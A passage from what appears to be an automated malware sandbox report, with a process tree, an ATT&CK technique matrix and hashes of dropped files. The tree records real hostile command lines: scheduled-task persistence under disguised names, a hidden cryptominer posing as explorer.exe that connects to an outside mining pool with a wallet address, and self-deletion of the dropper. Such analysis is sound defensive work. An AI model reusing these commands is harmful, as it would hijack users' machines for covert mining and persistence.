                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WindowsSecurity" /tr '"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"' & exit
                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                      PID:9812
                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                        schtasks /create /f /sc onlogon /rl highest /tn "WindowsSecurity" /tr '"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"'
                                                                                                                                                                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                        PID:8928
                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                        PID:4520
                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=antivirus.windowsdefenderautoupdater.me:3333 --user=4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQuiWzFUXCscKHeTzpD --pass=x --cpu-max-threads-hint=30 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=3 --cinit-idle-cpu=90 --nicehash --cinit-stealth
                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                          PID:10420
                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\SteamUpdate.exe
                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\SteamUpdate.exe"
                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                        PID:7292
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "VideoDriver" /tr '"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"' & exit
                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                            PID:10040
                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                              schtasks /create /f /sc onlogon /rl highest /tn "VideoDriver" /tr '"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"'
                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                              PID:4364
                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\VideoDriver.exe
                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\VideoDriver.exe"
                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                              PID:3752
                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "VideoDriver" /tr '"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"' & exit
                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                  PID:9100
                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                    schtasks /create /f /sc onlogon /rl highest /tn "VideoDriver" /tr '"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"'
                                                                                                                                                                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:4632
                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:10080
                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\UpdateCore.exe
                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\UpdateCore.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                  PID:9172
                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 1 -w 100 > Nul & Del "C:\Users\Admin\AppData\Local\Temp\BAF4.exe"& ping 1.1.1.1 -n 1 -w 900 > Nul & Del "C:\Users\Admin\AppData\Local\Temp\BAF4.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1328
                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                    ping 1.1.1.1 -n 1 -w 100
                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:4868
                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                    ping 1.1.1.1 -n 1 -w 900
                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2240
                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                  PID:6460
                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7668
                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                      PID:4792
                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                        PID:8156
                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                          PID:8744
                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7800
                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                              PID:8540
                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                PID:8208
                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7560
                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\E977.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\E977.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:3940
                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:9800
                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:4180
                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:4412
                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:6824
                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:9444
                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:9876
                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7496
                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\hjjsatt
                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Roaming\hjjsatt
                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:10800
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\adjsatt
                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Roaming\adjsatt
                                                                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:10808
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:11260

                                                                                                                                                                                                                                                                                                                                                                                                                                                      Network

                                                                                                                                                                                                                                                                                                                                                                                                                                                      MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                                                                                                                                                                                                      Execution

                                                                                                                                                                                                                                                                                                                                                                                                                                                      Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                                                                                      T1053

                                                                                                                                                                                                                                                                                                                                                                                                                                                      Persistence

                                                                                                                                                                                                                                                                                                                                                                                                                                                      Modify Existing Service

                                                                                                                                                                                                                                                                                                                                                                                                                                                      2
                                                                                                                                                                                                                                                                                                                                                                                                                                                      T1031

                                                                                                                                                                                                                                                                                                                                                                                                                                                      New Service

                                                                                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                                                                                      T1050

                                                                                                                                                                                                                                                                                                                                                                                                                                                      Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                                                                                      T1060

                                                                                                                                                                                                                                                                                                                                                                                                                                                      Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                                                                                      T1053

                                                                                                                                                                                                                                                                                                                                                                                                                                                      Privilege Escalation

                                                                                                                                                                                                                                                                                                                                                                                                                                                      New Service

                                                                                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                                                                                      T1050

                                                                                                                                                                                                                                                                                                                                                                                                                                                      Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                                                                                      T1053

                                                                                                                                                                                                                                                                                                                                                                                                                                                      Defense Evasion

                                                                                                                                                                                                                                                                                                                                                                                                                                                      Modify Registry

                                                                                                                                                                                                                                                                                                                                                                                                                                                      3
                                                                                                                                                                                                                                                                                                                                                                                                                                                      T1112

                                                                                                                                                                                                                                                                                                                                                                                                                                                      Disabling Security Tools

                                                                                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                                                                                      T1089

                                                                                                                                                                                                                                                                                                                                                                                                                                                      File Deletion

                                                                                                                                                                                                                                                                                                                                                                                                                                                      2
                                                                                                                                                                                                                                                                                                                                                                                                                                                      T1107

                                                                                                                                                                                                                                                                                                                                                                                                                                                      Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                                                                                      T1497

                                                                                                                                                                                                                                                                                                                                                                                                                                                      Install Root Certificate

                                                                                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                                                                                      T1130

                                                                                                                                                                                                                                                                                                                                                                                                                                                      Credential Access

                                                                                                                                                                                                                                                                                                                                                                                                                                                      Credentials in Files

                                                                                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                                                                                      T1081

                                                                                                                                                                                                                                                                                                                                                                                                                                                      Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                                      Query Registry

                                                                                                                                                                                                                                                                                                                                                                                                                                                      3
                                                                                                                                                                                                                                                                                                                                                                                                                                                      T1012

                                                                                                                                                                                                                                                                                                                                                                                                                                                      Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                                                                                      T1497

                                                                                                                                                                                                                                                                                                                                                                                                                                                      System Information Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                                      4
                                                                                                                                                                                                                                                                                                                                                                                                                                                      T1082

                                                                                                                                                                                                                                                                                                                                                                                                                                                      Remote System Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                                                                                      T1018

                                                                                                                                                                                                                                                                                                                                                                                                                                                      Collection

                                                                                                                                                                                                                                                                                                                                                                                                                                                      Data from Local System

                                                                                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                                                                                      T1005

                                                                                                                                                                                                                                                                                                                                                                                                                                                      Command and Control

                                                                                                                                                                                                                                                                                                                                                                                                                                                      Web Service

                                                                                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                                                                                      T1102

                                                                                                                                                                                                                                                                                                                                                                                                                                                      Impact

                                                                                                                                                                                                                                                                                                                                                                                                                                                      Inhibit System Recovery

                                                                                                                                                                                                                                                                                                                                                                                                                                                      2
                                                                                                                                                                                                                                                                                                                                                                                                                                                      T1490

                                                                                                                                                                                                                                                                                                                                                                                                                                                      Replay Monitor

                                                                                                                                                                                                                                                                                                                                                                                                                                                      Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                                                                                                                                      Downloads

                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                        1daac0c9a48a79976539b0722f9c3d3b

                                                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                        843218f70a6a7fd676121e447b5b74acb0d87100

                                                                                                                                                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                        e496ce805aa5b3ed8e1898803a536c683d031c5a61b2a54e5c89e02c4febecdf

                                                                                                                                                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                        2259e6e27e6ca6155b50bc0dfd8c3f9f1a31db53c8b4d1811e94e927e30aba2ded4c92a34dfee042d96bd5fd7cbfdbb73d168cc8d66f9b3a37df40980d6dfebc

                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                        1daac0c9a48a79976539b0722f9c3d3b

                                                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                        843218f70a6a7fd676121e447b5b74acb0d87100

                                                                                                                                                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                        e496ce805aa5b3ed8e1898803a536c683d031c5a61b2a54e5c89e02c4febecdf

                                                                                                                                                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                        2259e6e27e6ca6155b50bc0dfd8c3f9f1a31db53c8b4d1811e94e927e30aba2ded4c92a34dfee042d96bd5fd7cbfdbb73d168cc8d66f9b3a37df40980d6dfebc

                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                        aed57d50123897b0012c35ef5dec4184

                                                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                        568571b12ca44a585df589dc810bf53adf5e8050

                                                                                                                                                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                        096021eb5950ee16b7ec51756abe05f90c3530206e16286e7610b8a5a544a85e

                                                                                                                                                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                        ea0ee3a0762baa3539e8026a8c624ad897efe005faadcf1ff67ebfc555f29b912b24ad4342d5e0c209f36f5288867246bd1bdfed7df739e608a72fa7b4fa2d7c

                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                        ce11de1000560d312bf6ab0b5327e87b

                                                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                        557f3f780cb0f694887ada330a87ba976cdb168f

                                                                                                                                                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                        126daa976d1eaec1bd68eb53748caa325fc537f865051dd0d5f09d599175861a

                                                                                                                                                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                        655b45bcf75a79c174caf6fae84560980511d068f67a89883f70b264e88983f729c604b3484fdcb8d8f8a83105e43d740fe70e7a006806136bc423453d769655

                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                        ce11de1000560d312bf6ab0b5327e87b

                                                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                        557f3f780cb0f694887ada330a87ba976cdb168f

                                                                                                                                                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                        126daa976d1eaec1bd68eb53748caa325fc537f865051dd0d5f09d599175861a

                                                                                                                                                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                        655b45bcf75a79c174caf6fae84560980511d068f67a89883f70b264e88983f729c604b3484fdcb8d8f8a83105e43d740fe70e7a006806136bc423453d769655

                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
                                                                                                                                                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                        1c494825e5979add62914cfd05ce1821

                                                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                        b9070a59fc9dfcf6fc9bda98bda26b780e364d3d

                                                                                                                                                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                        d5a41fff5b0a0b3a0b02d046be48f3e254ecf9bcb9ba265aad29d57188596768

                                                                                                                                                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                        750b2ffc1ce7ecb108f2f48aea9581250816360aa94691f758e15af20e518f727dc77ae94b3703752f6657ad9f82ca55e5140518dbcb84c00f29830482762f77

                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
                                                                                                                                                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                        29d8af455f6b60e0c01a530d5426a5e2

                                                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                        caf3ecf648bdb52d93a1806d63b0533440a00b1d

                                                                                                                                                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                        919237b4d300d617fda2b259ae92b5b58c6a8aca8a249ec60d421c7739c65812

                                                                                                                                                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                        6ce7112fe1b55856c900650b9418537e489d593f44409c6cd7689eed85e7f10b75732704478a1203ad29efa4f853c786f38b9710b8f4af94aed1fa9436c80859

                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-OGD9A.tmp\gEga2cgo4qNeMiHj3tT00poP.tmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                        ffcf263a020aa7794015af0edee5df0b

                                                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                        bce1eb5f0efb2c83f416b1782ea07c776666fdab

                                                                                                                                                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                        1d07cfb7104b85fc0dffd761f6848ad176117e146bbb4079fe993efa06b94c64

                                                                                                                                                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                        49f2b062adfb99c0c7f1012c56f0b52a8850d9f030cc32073b90025b372e4eb373f06a351e9b33264967427b8174c060c8a6110979f0eaf0872f7da6d5e4308a

                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\3qJtxoADt5Bwhn7DiMi9yasB.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                        3b3aeef0fb9a412fa69d2f730e433d88

                                                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                        6a6633b0d0f658f9802263d26a1f6920d8c0f2f9

                                                                                                                                                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                        8dd2a56704198ab57a70bc7e8f8d338126af40cfe4a00a7c67dbecda59f648cd

                                                                                                                                                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                        655928e21eb9107dfa069142a990ce520fbd0d4510e97d93e885bd9301f772f6da8ea7c81a56ef83430674ccfcfa7836ee0d88446231622a0c4ba286e99fc306

                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\3qJtxoADt5Bwhn7DiMi9yasB.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                        3b3aeef0fb9a412fa69d2f730e433d88

                                                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                        6a6633b0d0f658f9802263d26a1f6920d8c0f2f9

                                                                                                                                                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                        8dd2a56704198ab57a70bc7e8f8d338126af40cfe4a00a7c67dbecda59f648cd

                                                                                                                                                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                        655928e21eb9107dfa069142a990ce520fbd0d4510e97d93e885bd9301f772f6da8ea7c81a56ef83430674ccfcfa7836ee0d88446231622a0c4ba286e99fc306

                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\8d_QkOtj1vJIPjPRfTvlMoul.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                        9f05dd1c0127fca4a5cd75507dcb076b

                                                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                        b0f27df7b18afc300225d0efbebb2668af0de226

                                                                                                                                                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                        2af2563062749b7f8865f02f8b1dd3fa4af532a798c05f37fb7c130b16b0cc36

                                                                                                                                                                                                                                                                                                                                                                                                                                                        SHA512

